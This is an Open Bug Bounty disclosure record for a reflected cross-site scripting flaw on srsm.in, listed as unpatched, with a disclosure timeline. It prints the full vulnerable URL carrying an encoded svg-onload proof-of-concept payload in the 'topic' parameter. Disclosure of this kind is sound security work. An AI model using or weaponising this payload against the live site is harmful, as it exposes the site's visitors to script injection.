srsm.in XSS vulnerability

2016-11-30T06:06:00
ID OBB:195573
Type openbugbounty
Reporter HARSHJOSHI
Modified 2016-12-28T06:13:00

Description

Vulnerable URL:
http://www.srsm.in/viewgallery3.jsp?topic=CBSE%20Regional%20Level%20Science%20Exhibition%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&pby=Admin&msg=1118281220151246362.txt&image1=1118060120161123531..jpg&image2=1118060120161159011.jpg&image3=&image4=&image5=&image6=&image7=&image8=&image9=&image10=&att=

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 02.09.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 8147170
VIP website status:| No
Check srsm.in SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 November, 2016 06:06 GMT
Generic security notifications sent to website owner| 30 November, 2016 06:09 GMT
Vulnerability details disclosed by researcher| 28 December, 2016 06:13 GMT